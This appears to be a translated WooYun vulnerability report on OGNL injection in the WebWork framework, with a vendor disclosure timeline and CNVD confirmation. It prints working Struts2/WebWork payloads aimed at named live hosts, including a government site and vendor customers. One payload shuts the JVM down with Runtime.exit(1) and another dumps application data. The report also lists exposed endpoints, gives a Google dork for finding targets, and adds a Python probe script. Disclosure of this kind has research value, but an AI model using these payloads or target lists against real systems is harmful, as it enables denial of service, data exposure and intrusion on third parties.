WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles, online reader ---------------- http://drop.zone.ci/
2013-08-13: Details reported to the vendor, awaiting vendor handling
2013-08-17: Vendor confirmed; details disclosed to the vendor only
2013-08-20: Details opened to third-party security partners
2013-10-11: Details opened to core white hats and domain experts
2013-10-21: Details opened to regular white hats
2013-10-31: Details opened to intern white hats
2013-11-11: Details disclosed to the public
As the title says!
WebWork is a powerful web-based MVC framework built on top of a Command-pattern framework called XWork. See the Baidu Baike entry for details: http://baike.baidu.com/view/25660.htm. As an important and powerful MVC framework in J2EE history, it was WebWork that served as the replacement during the transition from Struts1 to Struts2 once Struts1 had reached the end of the road; the fact that Struts2, when it chose to merge with WebWork, reused a large amount of WebWork's core code and structure shows just how strong it was!
Because Struts2 retains a large part of WebWork's functionality and characteristics, any Struts2 vulnerability that does not live in functionality or features Struts2 added itself exists in WebWork as well! You only have to read the WebWork source code when writing the PoC and exploit (the XWork 1 packages used by WebWork are com.opensymphony.xwork, whereas Struts2 uses com.opensymphony.xwork2)!
For example, the familiar Struts2 PoC from July 2010 (the `\u0023` / `\u003d` escapes are OGNL's `#` and `=`; the payload switches on static method access, disables the denyMethodExecution guard, then calls Runtime.exit(1)):
http://www.hanchuan.gov.cn:8080/kdgs/biz/portal/govservice/catalogServiceSummary.action?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(asdf)(('\u0023rt.exit(1)')(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1
http://211.137.133.80/csp/kbs/displayKnowledgeFirstPage.action?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(asdf)(('\u0023rt.exit(1)')(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1
Another example, the recent S2-016 Struts2 PoC (the `redirect:` parameter prefix is evaluated as OGNL; here it fetches the HttpServletResponse from the context and prints the `#application` map into it):
http://www.hanchuan.gov.cn:8080/kdgs/biz/portal/govservice/catalogServiceSummary.action?redirect:${%23rep%3d%23context.get%28%27com.opensymphony.xwork.dispatcher.HttpServletResponse%27%29,%23rep.getWriter%28%29.println%28%23application%29,%23rep.getWriter%28%29.flush%28%29,%23rep.getWriter%28%29.close%28%29}
http://211.137.133.80/csp/kbs/displayKnowledgeFirstPage.action?redirect:${%23rep%3d%23context.get%28%27com.opensymphony.xwork.dispatcher.HttpServletResponse%27%29,%23rep.getWriter%28%29.println%28%23application%29,%23rep.getWriter%28%29.flush%28%29,%23rep.getWriter%28%29.close%28%29}
http://pmo.cfischina.com/rdms/satisfyaid/actions/cstContactAction!register.action
Of course, WebWork's footprint is certainly wider than this. For example, many applications of Shanghai Mansuo Computer Technology Co., Ltd. (上海漫索计算机科技有限公司), and their product Mainsoft, make heavy use of the WebWork framework:
http://www.mansuo.com/home/index.action?redirect:${%23rep%3d%23context.get%28%27com.opensymphony.xwork.dispatcher.HttpServletResponse%27%29,%23rep.getWriter%28%29.println%28%23application%29,%23rep.getWriter%28%29.flush%28%29,%23rep.getWriter%28%29.close%28%29}
Mainsoft software customer list: http://www.mansuo.com/home/newsList.action?typeIds=2
If the software is deployed on an internal network the impact is somewhat mitigated, but some instances are deployed on the public internet. For example, the Google dork: intitle:集成化研发管理平台登录页面
Even when it is deployed externally, a URL that does not enter the WebWork framework's request pipeline is useless (it appears Struts1 and WebWork are used side by side). But I found a registration function, implemented in WebWork, that is exposed externally:
http://114.242.194.148/rdms/satisfyaid/actions/cstContactAction!register.action
http://pmo.cfischina.com/rdms/satisfyaid/actions/cstContactAction!register.action
http://218.85.36.216:8085/rdms/satisfyaid/actions/cstContactAction!register.action
http://center.ylzinfo.com:8085/rdms/satisfyaid/actions/cstContactAction!register.action
http://rdms.mansuo.com/rdms/satisfyaid/actions/cstContactAction!register.action
http://service.epsoft.com.cn/rdms/satisfyaid/actions/cstContactAction!register.action
http://116.228.221.108:22480/rdms/satisfyaid/actions/cstContactAction!register.action
...
PS: Since there will never be a patch, I certainly cannot publish the command-execution and webshell-writing exploits, nor the method for finding targets! If you really care (even though many of its characteristics are the same as Struts2's), it becomes easy once you are familiar with it. For example, here is a comparison of one PoC, where I change only one small thing:
Struts2:
?redirect:${%23rep%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23rep.getWriter%28%29.println%28%22struts2Bug-67c2c13e9cc0c312973c90245537fd04%22%29,%23rep.getWriter%28%29.flush%28%29,%23rep.getWriter%28%29.close%28%29}
WebWork:
?redirect:${%23rep%3d%23context.get%28%27com.opensymphony.xwork.dispatcher.HttpServletResponse%27%29,%23rep.getWriter%28%29.println%28%22webWorkBug-9de3deb185db08ab775d3fa8ad6aed8e%22%29,%23rep.getWriter%28%29.flush%28%29,%23rep.getWriter%28%29.close%28%29}
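The two checks above differ only in the package name of the context key (`xwork2` for Struts2, `xwork` for WebWork). As an added example, not code from the report's author, from WebWork or from Struts2, the following Python script generates the harmless marker form of that `redirect:` check for both variants and reports which one a target echoes back. The hostnames, the marker strings and the offline simulated server are constructed assumptions for illustration.

```python
"""
Added example (not from the original WooYun report, WebWork or Struts2):
build the harmless "marker" form of the `redirect:` OGNL check for both
XWork 2 (Struts2) and XWork 1 (WebWork) and fingerprint a target by which
marker it echoes. Hostnames, markers and the simulated server are constructed.
"""
import re
import secrets
import sys
import urllib.parse
import urllib.request
from typing import Callable, Dict, Optional

# The only difference between the two PoCs on this page: the package name of
# the context key that holds the servlet response.
RESPONSE_KEYS: Dict[str, str] = {
    "struts2": "com.opensymphony.xwork2.dispatcher.HttpServletResponse",
    "webwork": "com.opensymphony.xwork.dispatcher.HttpServletResponse",
}


def build_redirect_payload(framework: str, marker: str) -> str:
    """Decoded OGNL that prints `marker` into the response through the
    `redirect:` parameter prefix, i.e. the benign S2-016-style check above."""
    key = RESPONSE_KEYS[framework]
    ognl = (
        f"#rep=#context.get('{key}'),"
        f'#rep.getWriter().println("{marker}"),'
        "#rep.getWriter().flush(),"
        "#rep.getWriter().close()"
    )
    return "${" + ognl + "}"


def build_check_url(action_url: str, framework: str, marker: str) -> str:
    """Append the payload as a value-less query parameter named `redirect:...`.
    '#' must be percent-encoded or it would become a URL fragment; '$', '{',
    '}' and ',' are left bare exactly as in the page's PoC."""
    encoded = urllib.parse.quote(build_redirect_payload(framework, marker), safe="${},")
    sep = "&" if "?" in action_url else "?"
    return f"{action_url}{sep}redirect:{encoded}"


def _http_get(url: str, timeout: float = 10.0) -> Optional[str]:
    """Plain GET; None on any network or HTTP error (URLError/HTTPError are
    OSError subclasses, and many targets answer 4xx/5xx to the probe)."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.read().decode("utf-8", "replace")
    except (OSError, ValueError):
        return None


def fingerprint(
    action_url: str,
    fetch: Callable[[str], Optional[str]] = _http_get,
    markers: Optional[Dict[str, str]] = None,
) -> Optional[str]:
    """Probe one action URL with both variants and return 'struts2', 'webwork'
    or None. A fresh random marker per probe avoids false positives from
    cached pages or from input that is simply echoed back."""
    if markers is None:
        markers = {fw: f"{fw}Bug-{secrets.token_hex(16)}" for fw in RESPONSE_KEYS}
    for framework, marker in markers.items():
        body = fetch(build_check_url(action_url, framework, marker))
        if body is not None and marker in body:
            return framework
    return None


def simulated_vulnerable_server(framework: str) -> Callable[[str], str]:
    """Constructed stand-in for a vulnerable host (no network): it 'evaluates'
    the expression only when it names the context key of the framework it
    runs, and then echoes the marker just as the real check does."""
    key = RESPONSE_KEYS[framework]

    def fetch(url: str) -> str:
        decoded = urllib.parse.unquote(urllib.parse.urlsplit(url).query)
        if f"#context.get('{key}')" not in decoded:
            return "<html>normal page</html>"
        found = re.search(r'println\("([^"]+)"\)', decoded)
        return (found.group(1) + "\n") if found else ""

    return fetch


if __name__ == "__main__":
    if len(sys.argv) > 1:
        # Live probe of an action URL you are authorised to test.
        print(fingerprint(sys.argv[1]))
    else:
        # Offline demonstration against the constructed WebWork stand-in.
        print(fingerprint("http://example.invalid/home/index.action",
                          fetch=simulated_vulnerable_server("webwork")))
```

The probe only writes a random string into the response, so it confirms expression evaluation without executing commands. A result of None does not prove the host is safe: as noted above, the URL must actually pass through the WebWork pipeline, and a Struts1 action in the same deployment will never evaluate the expression.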
Let's ask the vendor what they have to say!
Severity: High
Vulnerability Rank: 14
Confirmed: 2013-08-17 21:44
CNVD confirmed and reproduced the described situation. The exploit code is similar to the Struts2 one; in fact it only needs to be changed to struts1. It has been reproduced on multiple instances, but for application software built on this framework no good remote blind-detection method has been found yet. rank 14
None yet